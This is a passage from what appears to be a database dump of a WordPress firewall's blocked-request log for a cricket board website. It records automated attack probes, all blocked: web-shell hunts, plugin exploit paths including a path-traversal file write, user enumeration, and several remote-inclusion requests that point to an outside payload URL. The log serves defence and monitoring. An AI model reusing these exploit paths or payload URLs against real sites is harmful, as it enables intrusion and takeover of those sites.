Safari\\/537.36\",\"2\":\"www.google.com\"}','odyzqQDvBPfcxulVXIOH0E4e',0,1673768578.7279,96,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimizations/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','zDdH2oS3ZA4EPMIrbkyaLFY6',0,1673768582.4672,106,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','N7K8hDzavxRXM3fJyA2Q9SgL',0,1673768584.8636,102,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','sYPcaVK5pC4ywGixvQZq8h2E',0,1673768588.9511,93,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/wp-engine-module/wp-engine.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','YZT3K9wcmhB0sL5iDO6R1rCd',0,1673768591.1308,131,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/wp-engine-module/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Fqg7jWrtowT9ZJBy2fDMN0Ep',0,1673768592.4515,86,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','GeTIOjprtY7JXDbVHnW9dAw8',0,1673768596.8797,95,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/apikey/apikey.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vJkcCI4Hb3naF6qOzeWSgpmr',0,1673768599.5290,96,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/apikey/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','RtTDq9KkYen7EM2aUAN4hvZB',0,1673768602.1763,91,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/cherry-plugin/admin/import-export/upload.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','OqRoJyF10KUmhkICMWbtVHDZ',0,1673768605.8089,119,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','sOkKLiW1xH348yXtdmnMZDGv',0,1673768606.3156,129,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','r1ZSK34HNyMgwOiEDFW9QGfv',0,1673768609.2028,100,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','PXs8pcr4BIzKuhDEvgxL3JOd',0,1673768611.0938,129,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','LCc1jkSJAUTsnwzx9ri05OQY',0,1673768615.2813,128,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/abruzi.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','FT39XYf6oHCBJ2tjkilguaxN',0,1673768617.7905,87,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/abruzi.php4','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','tsndUMgkY6HrS3D78jm0Nyz1',0,1673768624.2598,109,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-json/wp_live_chat_support/v1/remote_upload','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','zWvLaSpGdDlFR8u57r4oQTg0',0,1673768626.5056,119,'','GET',403,0,520,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/uploads/wp_live_chat/abruzi.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WhdYFGgPBptvKRxEeSI9y81Q',0,1673768630.3139,132,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://yorkshirecricketboard.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.yorkshirecricketboard.org.uk%2Fwp-admin%2Fadmin.php%3Fpage%3Dhtml2wp-settings&reauth=1','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','jo9F5xR6wDed8f4lciTIzypM',0,1673768634.1602,110,'','GET',404,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/uploads/html2wp/abruzi.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','DGL1uxmbayfqZz4ekYKOcCld',0,1673768640.1234,144,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','yXeTxDlp1Fan9fkVWm4sUH3Z',0,1673768643.4998,152,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/x.php?1=system','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','grqenfVh2OCKMb0PS3w98zA7',0,1673768647.8064,100,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/king.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','y8YmKDjlgcbLJ3Zorntza2S9',0,1673768648.7964,115,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Bv4QoJN6tXILjDngkMzWqV32',0,1673768654.9245,100,'','GET',403,0,700,0,1,'',0),('167.235.145.36',2817233188,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','w9rRho82H4YjLUyPIzpxaGXK',0,1673768657.4584,103,'','GET',403,0,700,0,1,'',0),('61.219.43.253',1037773821,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','3hRYBUtHin2Wg8xIDG7XkJoC',0,1673776461.6096,176,'','POST',403,0,600,0,1,'',0),('172.174.225.199',2897142215,'','https://yorkshirecricketboard.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.6.0 CPython\\/2.7.5 Linux\\/3.10.0-1160.76.1.el7.x86_64\"}','marxo7sVY6NyORCBKPviu3HD',0,1673794157.1780,88,'','GET',403,0,700,0,1,'',0),('141.94.247.170',2371811242,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','JMBeKlGuEpqdYL8AFxz36y0Z',0,1673808862.0952,161,'','POST',403,0,600,0,1,'',0),('185.220.101.1',3118228737,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\"}','9O7YKsGxXzke6iZFmuavSQ0p',0,1673818018.1511,1206,'','GET',403,0,520,0,1,'',0),('185.146.232.168',3113412776,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/2','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit\\/603.1.30 (KHTML, like Gecko) Version\\/10.0 Mobile\\/14E304 Safari\\/602.1\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\"}','nC1fQmKRFahJX7qibY0dVozs',0,1673818020.4482,1185,'','GET',403,0,520,0,1,'',0),('23.152.225.4',395895044,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\"}','xXPa7qoS0grNDf9HVmM3p5wU',0,1673818024.2144,886,'','GET',403,0,520,0,1,'',0),('185.243.218.27',3119766043,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/4','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\"}','ymOqdGiBfXPUuz2501EtwsY8',0,1673818025.6849,775,'','GET',403,0,520,0,1,'',0),('109.70.100.26',1833329690,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/5','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\"}','Rm9nADHtG1YTLZxcM7X60yQd',0,1673818027.2821,1285,'','GET',403,0,520,0,1,'',0),('128.199.131.42',2160558890,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','rpBGR0NAuxzQKZliaIfDh8PT',0,1673818724.3710,548,'','POST',403,0,600,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JIavNySAsecT4gVo2LMz8OPi',0,1673821582.6420,137,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bnYHDNl8poFBZmMJaw6cj9z2',0,1673821588.1869,106,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JqBPXaNeOw7RF2dWEi4IcxVm',0,1673821592.2465,106,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YsAlCPcRbxhi92zyF0NEt5qa',0,1673821594.2265,111,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','H2znKjPySeMqU0O6Rg7JB1FW',0,1673821602.0116,111,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DPVkaXF6ONWEYM5ohelwtirT',0,1673821607.2099,104,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','74L38p9HGPwDKqcTYflsIuxh',0,1673821611.9073,106,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4JuDZyNIb2mjFtadK5GUze9k',0,1673821614.3206,88,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','SvIjKlVTxW2EwfqOCPR0i3XY',0,1673821616.4438,106,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uc6zG43gfVNDvHEY9mO0W75K',0,1673821618.0073,96,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UyQ3RhkYGEs2AWfI64HgBcNS',0,1673821621.1362,103,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0uOLd6ByJWeRVazfC8kIsAGm',0,1673821622.6459,137,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','h8zCX5qdJ9RvYOkH6UgKe1PD',0,1673821625.6248,93,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FYRCVbilIUzLE5X9hJ4e8nOH',0,1673821630.4483,106,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','k1db0hWK5Eqp7tTojHlcsYPG',0,1673821635.7960,102,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tKCaf8UmO5lV9s6jR7wNv4EG',0,1673821637.8233,97,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','u3DnGkqRhfaXm9EOjCPvlTiB',0,1673821640.4138,105,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ny96gvZkcjzCGA18OTNfMBmD',0,1673821654.3478,98,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vlhND3O7uCnmy2ZkTHJRYQdI',0,1673821658.5473,107,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZYTxIpPWnF34vNGXtVqHsDEQ',0,1673821661.6088,112,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AS29CbxFJINDOWBdZpt8K5aH',0,1673821670.1516,150,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZVOPutep1QnDNMBiT8bzLUrY',0,1673821673.5301,103,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','KesUIPXQWdORxM4ya9izJbfp',0,1673821675.9594,119,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ijB1DuN3GwxPpKOh8JVtf92e',0,1673821678.9319,107,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5rnQc2yVHAeoRLvf4WqiuTm8',0,1673821683.3542,144,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nyvzRGbwkif7TDrCdZP3AQEu',0,1673821686.9961,101,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PZ9plV5fcmuo83RehztSM4CT',0,1673821688.0984,102,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','724tIrx5jhFpwJBZdOTSR8MX',0,1673821690.9144,88,'','POST',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','K1IY2j3fP6svqVzSBErtThWM',0,1673821694.2111,86,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PBZHIRYbsi1j9XqESfv236uh',0,1673821696.0999,116,'','GET',403,0,700,0,1,'',0),('116.203.33.1',1959469313,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 